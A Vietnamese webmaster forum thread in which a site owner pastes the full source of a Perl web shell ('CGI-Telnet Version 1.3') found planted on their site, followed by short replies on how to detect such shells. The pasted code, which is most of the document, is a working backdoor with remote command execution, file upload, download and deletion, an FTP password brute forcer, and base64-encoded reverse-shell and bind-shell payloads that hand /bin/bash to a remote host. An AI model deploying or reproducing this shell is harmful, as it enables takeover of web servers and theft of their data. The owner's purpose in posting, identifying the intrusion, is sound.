Help Shell ?

Discussion in 'Installation, Upgrade, and Import Support' started by dakhucquan.net, Dec 11, 2017.

  1. dakhucquan.net

    dakhucquan.net Thượng Đế

    Joined:
    Jun 27, 2015
    Messages:
    312
    Likes Received:
    133
    Trophy Points:
    43
    Gender:
    Male
    Tìm ra được mail thằng up shell này ko các bác nhỉ?
    Cái web cùi bắp thôi mà ko biết nó chèn làm gì

    Code:
    #!/usr/bin/perl -I/usr/local/bandmin
    use MIME::Base64;
    $Version= "CGI-Telnet Version 1.3";
    $EditPersion="MIsss";
    
    $Password = "svn";            # Change this. You will need to enter this
                    # to login.
    sub Is_Win(){
        $os = &trim($ENV{"SERVER_SOFTWARE"});
        if($os =~ m/win/i){
            return 1;
        }
        else{
            return 0;
        }
    }
    $WinNT = &Is_Win();                # You need to change the value of this to 1 if
                                    # you're running this script on a Windows NT
                                    # machine. If you're running it on Unix, you
                                    # can leave the value as it is.
    
    $NTCmdSep = "&";                # This character is used to seperate 2 commands
                                    # in a command line on Windows NT.
    
    $UnixCmdSep = ";";                # This character is used to seperate 2 commands
                                    # in a command line on Unix.
    
    $CommandTimeoutDuration = 10000;    # Time in seconds after commands will be killed
                                    # Don't set this to a very large value. This is
                                    # useful for commands that may hang or that
                                    # take very long to execute, like "find /".
                                    # This is valid only on Unix servers. It is
                                    # ignored on NT Servers.
    
    $ShowDynamicOutput = 1;            # If this is 1, then data is sent to the
                                    # browser as soon as it is output, otherwise
                                    # it is buffered and send when the command
                                    # completes. This is useful for commands like
                                    # ping, so that you can see the output as it
                                    # is being generated.
    
    # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
    
    $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
    $CmdPwd = ($WinNT ? "cd" : "pwd");
    $PathSep = ($WinNT ? "\\" : "/");
    $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
    $cols= 150;
    $rows= 26;
    #------------------------------------------------------------------------------
    # Reads the input sent by the browser and parses the input variables. It
    # parses GET, POST and multipart/form-data that is used for uploading files.
    # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
    # Other variables can be accessed using $in{'var'}, where var is the name of
    # the variable. Note: Most of the code in this function is taken from other CGI
    # scripts.
    #------------------------------------------------------------------------------
    sub ReadParse
    {
        local (*in) = @_ if @_;
        local ($i, $loc, $key, $val);
    
        $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
    
        if($ENV{'REQUEST_METHOD'} eq "GET")
        {
            $in = $ENV{'QUERY_STRING'};
        }
        elsif($ENV{'REQUEST_METHOD'} eq "POST")
        {
            binmode(STDIN) if $MultipartFormData & $WinNT;
            read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
        }
    
        # handle file upload data
        if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
        {
            $Boundary = '--'.$1; # please refer to RFC1867
            @list = split(/$Boundary/, $in);
            $HeaderBody = $list[1];
            $HeaderBody =~ /\r\n\r\n|\n\n/;
            $Header = $`;
            $Body = $';
             $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
            $in{'filedata'} = $Body;
            $Header =~ /filename=\"(.+)\"/;
            $in{'f'} = $1;
            $in{'f'} =~ s/\"//g;
            $in{'f'} =~ s/\s//g;
    
            # parse trailer
            for($i=2; $list[$i]; $i++)
            {
                $list[$i] =~ s/^.+name=$//;
                $list[$i] =~ /\"(\w+)\"/;
                $key = $1;
                $val = $';
                $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
                $val =~ s/%(..)/pack("c", hex($1))/ge;
                $in{$key} = $val;
            }
        }
        else # standard post data (url encoded, not multipart)
        {
            @in = split(/&/, $in);
            foreach $i (0 .. $#in)
            {
                $in[$i] =~ s/\+/ /g;
                ($key, $val) = split(/=/, $in[$i], 2);
                $key =~ s/%(..)/pack("c", hex($1))/ge;
                $val =~ s/%(..)/pack("c", hex($1))/ge;
                $in{$key} .= "\0" if (defined($in{$key}));
                $in{$key} .= $val;
            }
        }
    }
    
    #------------------------------------------------------------------------------
    # Prints the HTML Page Header
    # Argument 1: Form item name to which focus should be set
    #------------------------------------------------------------------------------
    sub PrintPageHeader
    {
        $EncodedCurrentDir = $CurrentDir;
        $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
        my $dir =$CurrentDir;
        $dir=~ s/\\/\\\\/g;
        print "Content-type: text/html\n\n";
        print <
    
    
    Edit by MIsss
    
    $HtmlMetaHeader
    
    
    
    
    
    
    $EditPersion $ENV{"SERVER_SOFTWARE"} Server IP: $ENV{'SERVER_ADDR'} | Your IP: $ENV{'REMOTE_ADDR'}
    Home | Command | GUI | Upload File | Download File | Back & Bind | Brute Forcer | Check Log | Domains/Users | Logout | Help
    END } #------------------------------------------------------------------------------ # Prints the Login Screen #------------------------------------------------------------------------------ sub PrintLoginScreen { print <
    
    
    Copyright (C) 2001 Rohitab Batra

    Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    ~\$ Connected !
    $ServerName~ Checking Server . . . . . . . . . . . . . . . . . . .
    $ServerName~ Trying connect to Command . . . . . . . . . . .
    $ServerName~\$ Connected Command!
    $ServerName~\$ OK! You can kill it!


    END } #------------------------------------------------------------------------------ # Add html special chars #------------------------------------------------------------------------------ sub HtmlSpecialChars($){ my $text = shift; $text =~ s/&/&/g; $text =~ s/"/"/g; $text =~ s/'/'/g; $text =~ s//>/g; return $text; } #------------------------------------------------------------------------------ # Add link for directory #------------------------------------------------------------------------------ sub AddLinkDir($) { my $ac=shift; my @dir=(); if($WinNT) { @dir=split(/\\/,$CurrentDir); }else { @dir=split("/",&trim($CurrentDir)); } my $path=""; my $result=""; foreach (@dir) { $path .= $_.$PathSep; $result.="".$_.$PathSep.""; } return $result; } #------------------------------------------------------------------------------ # Prints the message that informs the user of a failed login #------------------------------------------------------------------------------ sub PrintLoginFailedMessage { print <
    Login : Administrator
    Password:
    Login incorrect

    END } #------------------------------------------------------------------------------ # Prints the HTML form for logging in #------------------------------------------------------------------------------ sub PrintLoginForm { print < Login : Administrator
    Password: END } #------------------------------------------------------------------------------ # Prints the footer for the HTML Page #------------------------------------------------------------------------------ sub PrintPageFooter { print "
    o---[ Edit by $EditPersion ]---o
    "; } #------------------------------------------------------------------------------ # Retreives the values of all cookies. The cookies can be accesses using the # variable $Cookies{''} #------------------------------------------------------------------------------ sub GetCookies { @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'}); foreach $cookie(@httpcookies) { ($id, $val) = split(/=/, $cookie); $Cookies{$id} = $val; } } #------------------------------------------------------------------------------ # Prints the screen when the user logs out #------------------------------------------------------------------------------ sub PrintLogoutScreen { print "Connection closed by foreign host.

    "; } #------------------------------------------------------------------------------ # Logs out the user and allows the user to login again #------------------------------------------------------------------------------ sub PerformLogout { print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie &PrintPageHeader("p"); &PrintLogoutScreen; &PrintLoginScreen; &PrintLoginForm; &PrintPageFooter; exit; } #------------------------------------------------------------------------------ # This function is called to login the user. If the password matches, it # displays a page that allows the user to run commands. If the password doens't # match or if no password is entered, it displays a form that allows the user # to login #------------------------------------------------------------------------------ sub PerformLogin { if($LoginPassword eq $Password) # password matched { print "Set-Cookie: SAVEDPWD=$LoginPassword;\n"; &PrintPageHeader; print &ListDir; } else # password didn't match { &PrintPageHeader("p"); &PrintLoginScreen; if($LoginPassword ne "") # some password was entered { &PrintLoginFailedMessage; } &PrintLoginForm; &PrintPageFooter; exit; } } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to enter commands #------------------------------------------------------------------------------ sub PrintCommandLineInputForm { my $dir= "".&AddLinkDir("command").""; $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return <
    $Prompt
    END } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to download files #------------------------------------------------------------------------------ sub PrintFileDownloadForm { my $dir = &AddLinkDir("download"); $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return <
    $Prompt download

    Filename:

    Download:
    END } #------------------------------------------------------------------------------ # Prints the HTML form that allows the user to upload files #------------------------------------------------------------------------------ sub PrintFileUploadForm { my $dir= &AddLinkDir("upload"); $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; return <
    $Prompt upload

    Filename:

    Options:  

    Upload:   
    END } #------------------------------------------------------------------------------ # This function is called when the timeout for a command expires. We need to # terminate the script immediately. This function is valid only on Unix. It is # never called when the script is running on NT. #------------------------------------------------------------------------------ sub CommandTimeout { if(!$WinNT) { alarm(0); return <
    Command exceeded maximum time of $CommandTimeoutDuration second(s).
    Killed it! END } } #------------------------------------------------------------------------------ # This function displays the page that contains a link which allows the user # to download the specified file. The page also contains a auto-refresh # feature that starts the download automatically. # Argument 1: Fully qualified filename of the file to be downloaded #------------------------------------------------------------------------------ sub PrintDownloadLinkPage { local($FileUrl) = @_; my $result=""; if(-e $FileUrl) # if the file exists { # encode the file link so we can send it to the browser $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go"; $HtmlMetaHeader = ""; &PrintPageHeader("c"); $result .= <
    If the download does not start automatically, Click Here END $result .= &PrintCommandLineInputForm; } else # file doesn't exist { $result .= "Failed to download $FileUrl: $!"; $result .= &PrintFileDownloadForm; } return $result; } #------------------------------------------------------------------------------ # This function reads the specified file from the disk and sends it to the # browser, so that it can be downloaded by the user. # Argument 1: Fully qualified pathname of the file to be sent. #------------------------------------------------------------------------------ sub SendFileToBrowser { my $result = ""; local($SendFile) = @_; if(open(SENDFILE, $SendFile)) # file opened for reading { if($WinNT) { binmode(SENDFILE); binmode(STDOUT); } $FileSize = (stat($SendFile))[7]; ($Filename = $SendFile) =~ m!([^/^\\]*)$!; print "Content-Type: application/x-unknown\n"; print "Content-Length: $FileSize\n"; print "Content-Disposition: attachment; filename=$1\n\n"; print while(); close(SENDFILE); exit(1); } else # failed to open file { $result .= "Failed to download $SendFile: $!"; $result .=&PrintFileDownloadForm; } return $result; } #------------------------------------------------------------------------------ # This function is called when the user downloads a file. It displays a message # to the user and provides a link through which the file can be downloaded. # This function is also called when the user clicks on that link. In this case, # the file is read and sent to the browser. #------------------------------------------------------------------------------ sub BeginDownload { # get fully qualified path of the file to be downloaded if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute { $TargetFile = $TransferFile; } else # path is relative { chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; $TargetFile .= $PathSep.$TransferFile; } if($Options eq "go") # we have to send the file { &SendFileToBrowser($TargetFile); } else # we have to send only the link page { &PrintDownloadLinkPage($TargetFile); } } #------------------------------------------------------------------------------ # This function is called when the user wants to upload a file. If the # file is not specified, it displays a form allowing the user to specify a # file, otherwise it starts the upload process. #------------------------------------------------------------------------------ sub UploadFile { # if no file is specified, print the upload form again if($TransferFile eq "") { return &PrintFileUploadForm; } my $result=""; # start the uploading process $result .= "Uploading $TransferFile to $CurrentDir...
    "; # get the fullly qualified pathname of the file to be created chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/; $TransferFile =~ m!([^/^\\]*)$!; $TargetName .= $PathSep.$1; $TargetFileSize = length($in{'filedata'}); # if the file exists and we are not supposed to overwrite it if(-e $TargetName && $Options ne "overwrite") { $result .= "Failed: Destination file already exists.
    "; } else # file is not present { if(open(UPLOADFILE, ">$TargetName")) { binmode(UPLOADFILE) if $WinNT; print UPLOADFILE $in{'filedata'}; close(UPLOADFILE); $result .= "Transfered $TargetFileSize Bytes.
    "; $result .= "File Path: $TargetName
    "; } else { $result .= "Failed: $!
    "; } } $result .= &PrintCommandLineInputForm; return $result; } #------------------------------------------------------------------------------ # This function is called when the user wants to download a file. If the # filename is not specified, it displays a form allowing the user to specify a # file, otherwise it displays a message to the user and provides a link # through which the file can be downloaded. #------------------------------------------------------------------------------ sub DownloadFile { # if no file is specified, print the download form again if($TransferFile eq "") { &PrintPageHeader("f"); return &PrintFileDownloadForm; } # get fully qualified path of the file to be downloaded if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute { $TargetFile = $TransferFile; } else # path is relative { chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; $TargetFile .= $PathSep.$TransferFile; } if($Options eq "go") # we have to send the file { return &SendFileToBrowser($TargetFile); } else # we have to send only the link page { return &PrintDownloadLinkPage($TargetFile); } } #------------------------------------------------------------------------------ # This function is called to execute commands. It displays the output of the # command and allows the user to enter another command. The change directory # command is handled differently. In this case, the new directory is stored in # an internal variable and is used each time a command has to be executed. The # output of the change directory command is not displayed to the users # therefore error messages cannot be displayed. #------------------------------------------------------------------------------ sub ExecuteCommand { my $result=""; if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command { # we change the directory internally. The output of the # command is not displayed. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd; chop($CurrentDir = `$Command`); $result .= &PrintCommandLineInputForm; $result .= "Command: $RunCommand
    "; return $result; } #------------------------------------------------------------------------ # run command #------------------------------------------------------------------------ sub RunCmd { my $result=""; $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector; if(!$WinNT) { $SIG{'ALRM'} = \&CommandTimeout; alarm($CommandTimeoutDuration); } if($ShowDynamicOutput) # show output as it is generated { $|=1; $Command .= " |"; open(CommandOutput, $Command); while() { $_ =~ s/(\n|\r\n)$//; $result .= &HtmlSpecialChars("$_\n"); } $|=0; } else # show output after command completes { $result .= &HtmlSpecialChars('$Command'); } if(!$WinNT) { alarm(0); } return $result; } #============================================================================== # Form Save File #============================================================================== sub SaveFileForm { my $result =""; substr($RunCommand,0,5)=""; my $file=&trim($RunCommand); $save='
    '; $File=$CurrentDir.$PathSep.$RunCommand; my $dir="".&AddLinkDir("gui").""; if(-w $File) { $rows="23" }else { $msg="
    Permission denied!
    "; $rows="20" } $Prompt = $WinNT ? "$dir > " : "[admin\@$ServerName $dir]\$ "; $read=($WinNT)?"type":"less"; $RunCommand = "$read \"$RunCommand\""; $result .= <
    $Prompt
    Command: $RunCommand $save
    $msg
    "; $result .= "
    "; return $result; } #============================================================================== # Save File #============================================================================== sub SaveFile($) { my $Data= shift ; my $File= shift; $File=$CurrentDir.$PathSep.$File; if(open(FILE, ">$File")) { binmode FILE; print FILE $Data; close FILE; return 1; }else { return 0; } } #------------------------------------------------------------------------------ # Brute Forcer Form #------------------------------------------------------------------------------ sub BruteForcerForm { my $result=""; $result .= <
    ####################################
    Simple FTP brute forcer
    ####################################
    User:
    Pass:
    Sleep:
END return $result; } #------------------------------------------------------------------------------ # Brute Forcer #------------------------------------------------------------------------------ sub BruteForcer { my $result=""; $Server=$ENV{'SERVER_ADDR'}; if($in{'user'} eq "") { $result .= &BruteForcerForm; }else { use Net::FTP; @user= split(/\n/, $in{'user'}); @pass= split(/\n/, $in{'pass'}); chomp(@user); chomp(@pass); $result .= "

[+] Trying brute $ServerName
====================>>>>>>>>>>>><<<<<<<<<<====================

\n"; foreach $username (@user) { if(!($username eq "")) { foreach $password (@pass) { $ftp = Net::FTP->new($Server) or die "Could not connect to $ServerName\n"; if($ftp->login("$username","$password")) { $result .= "[+] ftp://$username:$password\@$Server
\n"; $ftp->quit(); break; } if(!($in{'sleep'} eq "0")) { sleep(int($in{'sleep'})); } $ftp->quit(); } } } $result .= "\n
==========>>>>>>>>>> Finished <<<<<<<<<<==========
\n"; } return $result; } #------------------------------------------------------------------------------ # Backconnect Form #------------------------------------------------------------------------------ sub BackBindForm { return <

BackConnect: Host: Port:
[+] Client listen before connect back!
[+] Try check your Port with http://www.canyouseeme.org/
[+] Client listen with command: nc -vv -l -p 80


Bind Port: Port: Password:
[+] Chuc nang chua dc test!
[+] Try command: nc $ENV{'SERVER_ADDR'} 1412

END } #------------------------------------------------------------------------------ # Backconnect use perl #------------------------------------------------------------------------------ sub BackBind { use MIME::Base64; use Socket; $backperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCiRTaGVsbAk9ICIvYmluL2Jhc2giOw0KJEFSR0M9QEFSR1Y7DQp1c2UgU29ja2V0Ow0KdXNlIEZpbGVIYW5kbGU7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgZ2V0cHJvdG9ieW5hbWUoInRjcCIpKSBvciBkaWUgcHJpbnQgIlstXSBVbmFibGUgdG8gUmVzb2x2ZSBIb3N0XG4iOw0KY29ubmVjdChTT0NLRVQsIHNvY2thZGRyX2luKCRBUkdWWzFdLCBpbmV0X2F0b24oJEFSR1ZbMF0pKSkgb3IgZGllIHByaW50ICJbLV0gVW5hYmxlIHRvIENvbm5lY3QgSG9zdFxuIjsNCnByaW50ICJDb25uZWN0ZWQhIjsNClNPQ0tFVC0+YXV0b2ZsdXNoKCk7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsIj4mU09DS0VUIik7DQpwcmludCAiLS09PSBDb25uZWN0ZWQgQmFja2Rvb3IgPT0tLSAgXG5cbiI7DQpzeXN0ZW0oInVuc2V0IEhJU1RGSUxFOyB1bnNldCBTQVZFSElTVCA7ZWNobyAnWytdIFN5c3RlbWluZm86ICc7IHVuYW1lIC1hO2VjaG87ZWNobyAnWytdIFVzZXJpbmZvOiAnOyBpZDtlY2hvO2VjaG8gJ1srXSBEaXJlY3Rvcnk6ICc7IHB3ZDtlY2hvOyBlY2hvICdbK10gU2hlbGw6ICc7JFNoZWxsIik7DQpjbG9zZSBTT0NLRVQ7"; $bindperl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJEFSR0M9QEFSR1Y7DQokcG9ydAk9ICRBUkdWWzBdOw0KJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0KJFNoZWxsCT0gIi9iaW4vYmFzaCI7DQpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKW9yIGRpZSAic29ja2V0OiQhIjsNCnNldHNvY2tvcHQoU0VSVkVSLCBTT0xfU09DS0VULCBTT19SRVVTRUFERFIsIHBhY2soImwiLCAxKSlvciBkaWUgInNldHNvY2tvcHQ6ICQhIjsNCmJpbmQoU0VSVkVSLCBzb2NrYWRkcl9pbigkcG9ydCwgSU5BRERSX0FOWSkpb3IgZGllICJiaW5kOiAkISI7DQpsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pCQlvciBkaWUgImxpc3RlbjogJCEiOw0KZm9yKDsgJHBhZGRyID0gYWNjZXB0KENMSUVOVCwgU0VSVkVSKTsgY2xvc2UgQ0xJRU5UKQ0Kew0KCW9wZW4oU1RESU4sICI+JkNMSUVOVCIpOw0KCW9wZW4oU1RET1VULCAiPiZDTElFTlQiKTsNCglvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7DQoJc3lzdGVtKCJ1bnNldCBISVNURklMRTsgdW5zZXQgU0FWRUhJU1QgO2VjaG8gJ1srXSBTeXN0ZW1pbmZvOiAnOyB1bmFtZSAtYTtlY2hvO2VjaG8gJ1srXSBVc2VyaW5mbzogJzsgaWQ7ZWNobztlY2hvICdbK10gRGlyZWN0b3J5OiAnOyBwd2Q7ZWNobzsgZWNobyAnWytdIFNoZWxsOiAnOyRTaGVsbCIpOw0KCWNsb3NlKFNURElOKTsNCgljbG9zZShTVERPVVQpOw0KCWNsb3NlKFNUREVSUik7DQp9DQo="; $ClientAddr = $in{'clientaddr'}; $ClientPort = int($in{'clientport'}); if($ClientPort eq 0) { return &BackBindForm; }elsif(!$ClientAddr eq "") { $Data=decode_base64($backperl); if(-w "/tmp/") { $File="/tmp/backconnect.pl"; }else { $File=$CurrentDir.$PathSep."backconnect.pl"; } open(FILE, ">$File"); print FILE $Data; close FILE; system("perl backconnect.pl $ClientAddr $ClientPort"); unlink($File); exit 0; }else { $Data=decode_base64($bindperl); if(-w "/tmp") { $File="/tmp/bindport.pl"; }else { $File=$CurrentDir.$PathSep."bindport.pl"; } open(FILE, ">$File"); print FILE $Data; close FILE; system("perl bindport.pl $ClientPort"); unlink($File); exit 0; } } #------------------------------------------------------------------------------ # Array List Directory #------------------------------------------------------------------------------ sub RmDir($) { my $dir = shift; if(opendir(DIR,$dir)) { while($file = readdir(DIR)) { if(($file ne ".") && ($file ne "..")) { $file= $dir.$PathSep.$file; if(-d $file) { &RmDir($file); } else { unlink($file); } } } closedir(DIR); } if(!rmdir($dir)) { } } sub FileOwner($) { my $file = shift; if(-e $file) { ($uid,$gid) = (stat($file))[4,5]; if($WinNT) { return "???"; } else { $name=getpwuid($uid); $group=getgrgid($gid); return $name."/".$group; } } return "???"; } sub ParentFolder($) { my $path = shift; my $Comm = "cd \"$CurrentDir\"".$CmdSep."cd ..".$CmdSep.$CmdPwd; chop($path = `$Comm`); return $path; } sub FilePerms($) { my $file = shift; my $ur = "-"; my $uw = "-"; if(-e $file) { if($WinNT) { if(-r $file){ $ur = "r"; } if(-w $file){ $uw = "w"; } return $ur . " / " . $uw; }else { $mode=(stat($file))[2]; $result = sprintf("%04o", $mode & 07777); return $result; } } return "0000"; } sub FileLastModified($) { my $file = shift; if(-e $file) { ($la) = (stat($file))[9]; ($d,$m,$y,$h,$i) = (localtime($la))[3,4,5,2,1]; $y = $y + 1900; @month = qw/1 2 3 4 5 6 7 8 9 10 11 12/; $lmtime = sprintf("%02d/%s/%4d %02d:%02d",$d,$month[$m],$y,$h,$i); return $lmtime; } return "???"; } sub FileSize($) { my $file = shift; if(-f $file) { return -s $file; } return "0"; } sub ParseFileSize($) { my $size = shift; if($size <= 1024) { return $size. " B"; } else { if($size <= 1024*1024) { $size = sprintf("%.02f",$size / 1024); return $size." KB"; } else { $size = sprintf("%.2f",$size / 1024 / 1024); return $size." MB"; } } } sub trim($) { my $string = shift; $string =~ s/^\s+//; $string =~ s/\s+$//; return $string; } sub AddSlashes($) { my $string = shift; $string=~ s/\\/\\\\/g; return $string; } sub ListDir { my $path = $CurrentDir.$PathSep; $path=~ s/\\\\/\\/g; my $result = "
Path: [ ".&AddLinkDir("gui")." ]
"; if(-d $path) { my @fname = (); my @dname = (); if(opendir(DIR,$path)) { while($file = readdir(DIR)) { $f=$path.$file; if(-d $f) { push(@dname,$file); } else { push(@fname,$file); } } closedir(DIR); } @fname = sort { lc($a) cmp lc($b) } @fname; @dname = sort { lc($a) cmp lc($b) } @dname; $result .= "
"; my $style="line"; my $i=0; foreach my $d (@dname) { $style= ($style eq "line") ? "notline": "line"; $d = &trim($d); $dirname=$d; if($d eq "..") { $d = &ParentFolder($path); } elsif($d eq ".") { $d = $path; } else { $d = $path.$d; } $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $i++; } foreach my $f (@fname) { $style= ($style eq "line") ? "notline": "line"; $file=$f; $f = $path.$f; $view = "?dir=".$path."&view=".$f; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $result .= ""; $i++; } $result .= "
File Name File Size Owner Permission Last Modified Action
[ ".$dirname." ]DIR".&FileOwner($d)."".&FilePerms($d)."".&FileLastModified($d)."Rename | Remove
".$file."".&ParseFileSize(&FileSize($f))."".&FileOwner($f)."".&FilePerms($f)."".&FileLastModified($f)."Edit | Rename | Download | Remove
"; } return $result; } #------------------------------------------------------------------------------ # Try to View List User #------------------------------------------------------------------------------ sub ViewDomainUser { open (domains, '/etc/named.conf') or $err=1; my @cnzs = ; close d0mains; my $style="line"; my $result="
Hoang Sa - Truong Sa
"; if ($err) { $result .= ('

C0uldn\'t Bypass it , Sorry

'); return $result; }else { $result .= ''; } foreach my $one (@cnzs) { if($one =~ m/.*?zone "(.*?)" {/) { $style= ($style eq "line") ? "notline": "line"; $filename= "/etc/valiases/".$one; $owner = getpwuid((stat($filename))[4]); $result .= ''; } } $result .= '
Domains User
'.$one.' '.$owner.'
'; return $result; } #------------------------------------------------------------------------------ # View Log #------------------------------------------------------------------------------ sub ViewLog { if($WinNT) { return "

Don't run on Windows

"; } my $result=""; my @pathlog=( '/usr/local/apache/logs/error_log', '/var/log/httpd/error_log', '/usr/local/apache/logs/access_log' ); my $i=0; my $perms; my $sl; foreach my $log (@pathlog) { if(-w $log) { $perms="OK"; }else { chop($sl = `ln -s $log error_log_$i`); if(&trim($ls) eq "") { if(-r $ls) { $perms="OK"; $log="error_log_".$i; } }else { $perms="Cancel"; } } $result .=< END $i++; } $result .="
Path LogSubmit
$perms
"; return $result; } #------------------------------------------------------------------------------ # Main Program - Execution Starts Here #------------------------------------------------------------------------------ &ReadParse; &GetCookies; $ScriptLocation = $ENV{'SCRIPT_NAME'}; $ServerName = $ENV{'SERVER_NAME'}; $LoginPassword = $in{'p'}; $RunCommand = $in{'c'}; $TransferFile = $in{'f'}; $Options = $in{'o'}; $Action = $in{'a'}; $Action = "command" if($Action eq ""); # no action specified, use default # get the directory in which the commands will be executed $CurrentDir = &trim($in{'d'}); # mac dinh xuat thong tin neu ko co lenh nao! $RunCommand= $WinNT?"dir":"dir -lia" if($RunCommand eq ""); chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq ""); $LoggedIn = $Cookies{'SAVEDPWD'} eq $Password; if($Action eq "login" || !$LoggedIn) # user needs/has to login { &PerformLogin; }elsif($Action eq "gui") # GUI directory { &PrintPageHeader; if(!$WinNT) { $chmod=int($in{'chmod'}); if(!($chmod eq 0)) { $chmod=int($in{'chmod'}); $file=$CurrentDir.$PathSep.$TransferFile; chop($result= `chmod $chmod "$file"`); if(&trim($result) eq "") { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } } $rename=$in{'rename'}; if(!$rename eq "") { if(rename($TransferFile,$rename)) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } $remove=$in{'remove'}; if($remove ne "") { $rm = $CurrentDir.$PathSep.$remove; if(-d $rm) { &RmDir($rm); }else { if(unlink($rm)) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } } } print &ListDir; } elsif($Action eq "command") # user wants to run a command { &PrintPageHeader("c"); print &ExecuteCommand; } elsif($Action eq "save") # user wants to save a file { &PrintPageHeader; if(&SaveFile($in{'data'},$in{'file'})) { print " Done!
"; }else { print " Sorry! You dont have permissions!
"; } print &ListDir; } elsif($Action eq "upload") # user wants to upload a file { &PrintPageHeader; print &UploadFile; } elsif($Action eq "backbind") # user wants to back connect or bind port { &PrintPageHeader("clientport"); print &BackBind; } elsif($Action eq "bruteforcer") # user wants to brute force { &PrintPageHeader; print &BruteForcer; }elsif($Action eq "download") # user wants to download a file { print &DownloadFile; }elsif($Action eq "checklog") # user wants to view log file { &PrintPageHeader; print &ViewLog; }elsif($Action eq "domainsuser") # user wants to view list user/domain { &PrintPageHeader; print &ViewDomainUser; }elsif($Action eq "logout") # user wants to logout { &PerformLogout; } &PrintPageFooter;
 
Last edited: Dec 11, 2017
THB likes this.
  • tuna

    tuna Thượng Đế

    Joined:
    Jan 30, 2017
    Messages:
    641
    Likes Received:
    246
    Trophy Points:
    43
    Gender:
    Male
    Làm sao để biết bị dính shell vậy bác?
     
    THB likes this.
  • dakhucquan.net

    dakhucquan.net Thượng Đế

    Joined:
    Jun 27, 2015
    Messages:
    312
    Likes Received:
    133
    Trophy Points:
    43
    Gender:
    Male
    quét
     
    THB likes this.
  • THB

    THB Admin - Founder Staff Member

    Joined:
    Feb 25, 2015
    Messages:
    6,336
    Likes Received:
    3,550
    Trophy Points:
    113
    Gender:
    Male
    Occupation:
    CEO
    Location:
    Bình Dương
    Home Page:
    cái này bác @vanphu113 vào xem sao? mình chịu thua. hii. Kiến thức có hạn.
     
  • ngaithon

    ngaithon Thượng Đế

    Joined:
    Feb 13, 2017
    Messages:
    112
    Likes Received:
    23
    Trophy Points:
    18
    Gender:
    Male
    Quét thế nào vậy bác. Cho e xin cách quét ạ
     
    THB likes this.
  • aviaiva

    aviaiva Thượng Đế

    Joined:
    Mar 1, 2016
    Messages:
    339
    Likes Received:
    265
    Trophy Points:
    63
    Location:
    hn
    Home Page:
    code quét cứ xuất hiện Base64 thì coi như có shell trong code, nhưng điều đó không phải lúc nào cũng đúng, cái này giờ ai cũng biết rồi nên chỉ có gà mờ nó mới chèn shell kiểu đó.
    Nếu trang bạn không mang lại lợi nhuận cho hacker thì nó chả thèm mò vào, trừ phi bạn tự rước nó vào khi sử dụng code bên ngoài, style, mã nguồn chia sẻ lung tung trên mạng.
    nói thật tin nhau là chính + nghèo ít tiền nên làm liều, chứ có mấy ai làm forum am hiểu hết về code đâu.
    tốt nhất là tìm diễn đàn uy tín kiểu như vnxf để lấy style, addon, mã nguồn xen, nếu có dính phốt thì tỉ lệ cũng thấp hơn mấy trang khác
     
    THB likes this.
  • ngaithon

    ngaithon Thượng Đế

    Joined:
    Feb 13, 2017
    Messages:
    112
    Likes Received:
    23
    Trophy Points:
    18
    Gender:
    Male
    E
    E toàn lấy ở vnxf mà cũng ko biết có bị dính ko nữa.
     
    THB likes this.
  • aviaiva

    aviaiva Thượng Đế

    Joined:
    Mar 1, 2016
    Messages:
    339
    Likes Received:
    265
    Trophy Points:
    63
    Location:
    hn
    Home Page:
